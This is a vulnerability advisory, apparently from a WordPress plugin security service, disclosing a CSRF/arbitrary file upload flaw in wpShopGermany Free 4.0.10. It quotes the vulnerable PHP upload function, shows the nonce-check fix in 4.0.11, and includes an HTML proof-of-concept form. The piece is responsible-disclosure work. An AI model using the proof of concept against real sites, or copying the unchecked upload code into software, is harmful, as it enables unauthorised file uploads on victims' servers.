02 Jul

Our Proactive Monitoring Caught a Cross-Site Request Forgery (CSRF)/Arbitrary File Upload Vulnerability in wpShopGermany Free

One of the ways we help to improve the security of WordPress plugins, not just for our customers, but for everyone using them, is the proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities. That sometimes leads to us catching a vulnerability of a more limited variant of one of those serious vulnerability types, which isn’t as much concern for the average website, but could be utilized in a targeted attack. That happened with the cross-site request forgery (CSRF)/arbitrary file upload vulnerability we found in the plugin wpShopGermany Free. This vulnerability could have allowed an attacker that could get a logged in Administrator to visit a URL the attacker controls, to unintentionally upload arbitrary files.

Since the check used to spot this is also included in our Plugin Security Checker (which  is accessible through a WordPress plugin of its own), it is another of reminder of how that can help to indicate which plugins are in greater need of security review (for which we do as part of our service as well as separately).

The vulnerability occurred in the function widerrufsbelehrungAction() in the file /controller/wpsg_AdminController.class.php. That function runs when accessing the page /wp-admin/admin.php?page=wpsg-Admin&subaction=widerrufsbelehrung, which is accessible to Administrator-lever users. When that function was run as of version 4.0.10, if the GET or POST input “submit” existed and file attached to an input named “wpsg_widerrufsformular” existed then the file would have been saved to the directory /wp-content/uploads/wpsg/wpsg_revocation/:

1731
1732
1733
1734
1735
1736
1737
1738
1739
1740
1741
1742
1743
1744
1745
1746
1747
public function widerrufsbelehrungAction()
{
 
	if (isset($_REQUEST['submit']))
	{
 
		$this->shop->update_option('wpsg_ps_mailwiderruf', $_REQUEST['wpsg_ps_mailwiderruf']);
		$this->shop->addTranslationString('wpsg_ps_mailwiderruf', $_REQUEST['wpsg_ps_mailwiderruf']);
 
		if (file_exists($_FILES['wpsg_widerrufsformular']['tmp_name']))
		{
 
			if (!file_exists(WPSG_PATH_UPLOADS.'wpsg_revocation/')) mkdir(WPSG_PATH_UPLOADS.'wpsg_revocation/', 0775, true);
 
			$this->clearRevocationForm();
 
			move_uploaded_file($_FILES['wpsg_widerrufsformular']['tmp_name'], WPSG_PATH_UPLOADS.'wpsg_revocation/'.$_FILES['wpsg_widerrufsformular']['name']);

There was no check for a valid nonce, which would prevent cross-site request forgery (CSRF) from occurring. There also was no restriction on what types of files can be uploaded.

After we notified the developer they released version 4.0.11, which fixes the vulnerability by checking for a valid nonce before allowing files:

1731
1732
1733
1734
1735
1736
1737
public function widerrufsbelehrungAction()
{
 
	if (isset($_REQUEST['submit']))
	{
 
		\check_admin_referer('wpsg-save-revocation');

A check of the mime type of the file being uploaded was also added.

There are other locations in the plugin without proper protection against CSRF and the developer said that those would be fixed in the next 4 weeks.

Proof of Concept

The following proof of concept will upload the selected file to the directory/wp-content/uploads/wpsg/wpsg_revocation/, when logged in to WordPress as Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=wpsg-Admin&subaction=widerrufsbelehrung&noheader=1" method="POST" enctype="multipart/form-data">
<input type="file" name="wpsg_widerrufsformular" />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • June 25, 2018 – Developer notified.
  • June 26, 2018 – Developer responds.
  • June 29, 2018 – Version 4.0.11 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *